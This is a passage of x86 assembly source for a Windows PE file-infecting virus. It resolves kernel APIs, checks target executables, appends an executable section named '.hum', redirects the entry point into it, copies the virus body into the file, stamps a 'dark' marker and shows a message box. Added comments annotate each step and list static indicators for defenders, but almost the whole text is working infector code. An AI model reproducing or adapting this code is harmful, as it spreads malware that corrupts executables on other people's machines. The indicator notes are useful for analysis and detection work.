add esi,[ecx+78h]
;得到esi=IMAGE_EXPORT_DIRECTORY入口
add eax,[esi+1ch] ;eax=AddressOfFunctions的地址
mov ADDRofFun,eax
mov ecx,[esi+18h] ;ecx=NumberOfNames
add edx,[esi+24h] ;edx=AddressOfNameOrdinals
add edi,[esi+20h] ;esi=AddressOfNames
invoke K32_api_retrieve,Base,sApi
mov ebx,ADDRofFun
mov eax,[ebx+eax*4] ;要*4才得到偏移
add eax,Base ;加上Base!
mov [esp+7*4],eax ;eax返回api地址
popad
ret
GetApiA endp
;-----------------------------------------------------------------------
; Module-name strings and module-base slots.
; These are addressed elsewhere through the delta form [ebp+name], so the
; order and layout of the definitions below is part of the program's
; behavior and must not be rearranged.
;-----------------------------------------------------------------------
u32 db "User32.dll",0                 ; module name passed to LoadLibraryA
k32 db "Kernel32.dll",0               ; module name (consumer not in this span)
appBase dd ?                          ; base-address slot; written by code outside this span
k32Base dd ?                          ; base-address slot; presumably the Kernel32 base (writer not in span)
;-----------------------------------------apis needed
;-----------------------------------------------------------------------
; API-by-name table.
; lpApiAddrs : pointers to the NUL-terminated API name strings below,
;              terminated by a pair of zero dwords.
; sXxx       : the name strings themselves (plain text in the image).
; aXxx       : slots for the resolved addresses; the body calls through
;              them as call [ebp+aXxx]. They are zero in the image and are
;              presumably filled at run time by a resolver not in this span.
; For defenders: the clear-text API names (CreateFileMappingA,
; MapViewOfFile, SetEndOfFile, ...) are a simple static string indicator.
;-----------------------------------------------------------------------
lpApiAddrs label near
dd offset sGetModuleHandle
dd offset sGetProcAddress
dd offset sLoadLibrary
dd offset sCreateFile
dd offset sCreateFileMapping
dd offset sMapViewOfFile
dd offset sUnmapViewOfFile
dd offset sCloseHandle
dd offset sGetFileSize
dd offset sSetEndOfFile
dd offset sSetFilePointer
dd offset sExitProcess
dd 0,0                                ; end-of-table marker
sGetModuleHandle db "GetModuleHandleA",0
sGetProcAddress db "GetProcAddress",0
sLoadLibrary db "LoadLibraryA",0
sCreateFile db "CreateFileA",0
sCreateFileMapping db "CreateFileMappingA",0
sMapViewOfFile db "MapViewOfFile",0
sUnmapViewOfFile db "UnmapViewOfFile",0
sCloseHandle db "CloseHandle",0
sGetFileSize db "GetFileSize",0
sSetFilePointer db "SetFilePointer",0
sSetEndOfFile db "SetEndOfFile",0
sExitProcess db "ExitProcess",0
; Resolved-address slots, one dword each, addressed as [ebp+aXxx].
aGetModuleHandle dd 0
aGetProcAddress dd 0
aLoadLibrary dd 0
aCreateFile dd 0
aCreateFileMapping dd 0
aMapViewOfFile dd 0
aUnmapViewOfFile dd 0
aCloseHandle dd 0
aGetFileSize dd 0
aSetFilePointer dd 0
aSetEndOfFile dd 0
aExitProcess dd 0
;-----------------------------------------
;;========================modipe.asm=================
;-----------------------------------------------------------------------
; PE modification: appends a section named ".hum" to a memory-mapped PE
; file and redirects AddressOfEntryPoint into it.
; In:   eax = presumably the base of the mapped target file (set before
;             this span); ebp = delta base for every [ebp+var] reference.
; Uses: pe_Header, sec_align, file_align, newEip, oldEip, oldEnd, pMem,
;       hfile, aSetFilePointer, aSetEndOfFile, vBegin, __Start, VirusLen
;       (all declared outside this span).
; Exits: jumps to CouldNotInfect (not in span) when the file is rejected.
; Static indicators an infected file carries (each written below):
;   - a final section header named ".hum" with Characteristics 0E0000020h
;     (CNT_CODE | MEM_EXECUTE | MEM_READ | MEM_WRITE)
;   - IMAGE_FILE_HEADER.TimeDateStamp overwritten with the marker 'dark'
;     (stored as the bytes "krad"); the same field is the re-infection check
;   - AddressOfEntryPoint pointing into that last section
;-----------------------------------------------------------------------
xchg eax,esi                          ; esi = mapped image, eax = previous esi
cmp word ptr [esi],'ZM'               ; IMAGE_DOS_HEADER.e_magic == "MZ"
jne CouldNotInfect
add esi,[esi+3ch]                     ; esi += e_lfanew -> IMAGE_NT_HEADERS
cmp word ptr [esi],'EP'               ; Signature == "PE"
jne CouldNotInfect                    ; not a PE image: leave the file alone
cmp dword ptr [esi+8],'dark'          ; FileHeader.TimeDateStamp already holds the marker?
je CouldNotInfect                     ; yes: file was processed before, skip
mov [ebp+pe_Header],esi               ; keep the NT-headers pointer
mov ecx,[esi+74h]                     ; OptionalHeader.NumberOfRvaAndSizes
imul ecx,ecx,8                        ; * sizeof(IMAGE_DATA_DIRECTORY)
lea eax,[ecx+esi+78h]                 ; past the DataDirectory = section table (assumes a standard-size optional header)
movzx ecx,word ptr [esi+6h]           ; FileHeader.NumberOfSections
imul ecx,ecx,28h                      ; * sizeof(IMAGE_SECTION_HEADER)
add eax,ecx                           ; eax -> first byte after the last section header
xchg eax,esi                          ; eax -> NT headers, esi -> slot for the new section header
;;**************************
;; Fields of the new IMAGE_SECTION_HEADER as written below:
;; Name                  ".hum" (first 4 bytes only)
;; VirtualSize           VirusLen
;; VirtualAddress        previous VA + previous VirtualSize rounded up to SectionAlignment
;; SizeOfRawData         VirusLen rounded up to FileAlignment
;; PointerToRawData      previous PointerToRawData + previous SizeOfRawData
;; PointerToRelocations  left as found in the file
;; PointerToLinenumbers  left as found in the file
;; NumberOfRelocations   left as found in the file
;; NumberOfLinenumbers   left as found in the file
;; Characteristics       0E0000020h
;;**************************
mov dword ptr [esi],'muh.'            ; Name = ".hum" (remaining 4 name bytes not written)
mov dword ptr [esi+8],VirusLen        ; Misc.VirtualSize
; VirtualAddress: previous section's VA plus its VirtualSize rounded up to SectionAlignment
mov ebx,[eax+38h]                     ; OptionalHeader.SectionAlignment
mov [ebp+sec_align],ebx
mov edi,[eax+3ch]                     ; OptionalHeader.FileAlignment
mov [ebp+file_align],edi
mov ecx,[esi-40+0ch]                  ; previous header (40 = 28h bytes back): VirtualAddress
mov eax,[esi-40+8]                    ; previous header: VirtualSize
xor edx,edx
div ebx                               ; eax = VirtualSize / SectionAlignment, edx = remainder
test edx,edx
je @@@1
inc eax                               ; round up when the division left a remainder
@@@1:
mul ebx                               ; eax = aligned size of the previous section
add eax,ecx                           ; + previous VA = VA of the new section
mov [esi+0ch],eax                     ; VirtualAddress
add eax,__Start-vBegin                ; + offset of __Start within the appended body
mov [ebp+newEip],eax                  ; RVA the entry point is redirected to
mov dword ptr [esi+24h],0E0000020h    ; Characteristics: CNT_CODE | MEM_EXECUTE | MEM_READ | MEM_WRITE
mov eax,VirusLen                      ; SizeOfRawData: VirusLen rounded up to FileAlignment
cdq
div edi                               ; eax = VirusLen / FileAlignment
je @@@2
inc eax                               ; round up
@@@2:
mul edi
mov dword ptr [esi+10h],eax           ; SizeOfRawData
mov eax,[esi-40+14h]                  ; previous header: PointerToRawData
add eax,[esi-40+10h]                  ; + previous SizeOfRawData
mov [esi+14h],eax                     ; PointerToRawData = right after the previous section's raw data
mov [ebp+oldEnd],eax                  ; file offset at which the body is appended below
mov eax,[ebp+pe_Header]
inc word ptr [eax+6h]                 ; FileHeader.NumberOfSections += 1
mov ebx,[eax+28h]                     ; OptionalHeader.AddressOfEntryPoint
mov [ebp+oldEip],ebx                  ; original entry point, saved for later use (outside span)
mov ebx,[ebp+newEip]
mov [eax+28h],ebx                     ; entry point now points into the new section
;comment $
mov ebx,[eax+50h]                     ; OptionalHeader.SizeOfImage
add ebx,VirusLen
mov ecx,[ebp+sec_align]
xor edx,edx
xchg eax,ebx                          ; eax = SizeOfImage + VirusLen, ebx = NT-headers pointer
cdq
div ecx
test edx,edx
je @@@3
inc eax                               ; round up to SectionAlignment
@@@3:
mul ecx
xchg eax,ebx                          ; eax -> NT headers again, ebx = aligned size
mov [eax+50h],ebx                     ; SizeOfImage updated
;$
mov dword ptr [eax+8],'dark'          ; write the marker into TimeDateStamp (the check above reads it)
cld                                   ; forward copy
mov ecx,VirusLen
mov edi,[ebp+oldEnd]
add edi,[ebp+pMem]                    ; edi = mapping base + old end of file
lea esi,[ebp+vBegin]                  ; esi = start of the body in memory
rep movsb                             ; append VirusLen bytes to the mapping
xor eax,eax
sub edi,[ebp+pMem]                    ; edi = new file length (oldEnd + VirusLen)
push FILE_BEGIN                       ; dwMoveMethod
push eax                              ; lpDistanceToMoveHigh = NULL
push edi                              ; lDistanceToMove = new length
push [ebp+hfile]
call [ebp+aSetFilePointer]            ; SetFilePointer(hfile, newLen, NULL, FILE_BEGIN)
push [ebp+hfile]
call [ebp+aSetEndOfFile]              ; SetEndOfFile(hfile): file now ends after the new section
;============================disLen.asm
;-----------------------------------------------------------------------
; Display path: resolves MessageBoxA from User32, formats VirusLen as 8
; ASCII hex digits into val (most significant nibble first) and shows a
; message box with text CopyRight and title sztit.
; Uses: u32, aLoadLibrary, aGetProcAddress, sMessageBoxA, aMessageBoxA,
;       val, sztit, CopyRight (declared outside this span) and the
;       binToAscii helper. Ends with a jump to __where (not in span).
;-----------------------------------------------------------------------
lea eax,[ebp+u32]
push eax                              ; lpLibFileName = "User32.dll"
call dword ptr [ebp+aLoadLibrary]     ; eax = LoadLibraryA("User32.dll")
test eax,eax
jnz @g1                               ; target is the very next label: execution continues either way
@g1:
lea EDX,[EBP+sMessageBoxA]            ; presumably the string "MessageBoxA" (defined elsewhere)
push edx                              ; lpProcName
push eax                              ; hModule = result of LoadLibraryA above
mov eax,dword ptr [ebp+aGetProcAddress]
call eax                              ; eax = GetProcAddress(hModule, "MessageBoxA")
mov [ebp+aMessageBoxA],eax            ; cached for the call below
;-----------------------------------------
mov ebx,VirusLen                      ; value to render in hex
mov ecx,8                             ; 8 nibbles in a dword
cld                                   ; stosb in binToAscii advances edi
lea edi,[ebp+val]                     ; output buffer; must hold at least 8 bytes (declared elsewhere)
L1:
rol ebx,4                             ; bring the next-most-significant nibble into bits 3:0
call binToAscii                       ; [edi] = hex digit of the low nibble, edi += 1
loop L1
push 40h+1000h                        ; uType = MB_ICONINFORMATION | MB_SYSTEMMODAL
lea eax,[ebp+sztit]
push eax                              ; lpCaption
lea eax,[ebp+CopyRight]
push eax                              ; lpText
push 0                                ; hWnd = NULL
call [ebp+aMessageBoxA]               ; MessageBoxA(NULL, CopyRight, sztit, uType)
jmp __where
;-----------------------------------------
;-----------------------------------------------------------------------
; binToAscii: store the low nibble of ebx as one upper-case ASCII hex digit.
; In:    ebx = value (only bits 3:0 are used), edi -> output byte, DF = 0
; Out:   [edi] = '0'..'9' or 'A'..'F', edi += 1
; Clobb: eax, flags
;-----------------------------------------------------------------------
binToAscii proc near
mov eax,ebx
and eax,0fh                           ; eax = nibble (0..15)
cmp eax,9
ja @f                                 ; 0Ah..0Fh take the letter path
add al,'0'                            ; '0'..'9'
stosb
ret
@@:
add al,'A'-10                         ; 'A'..'F'  ('A'-10 = 37h)
stosb
ret
binToAscii endp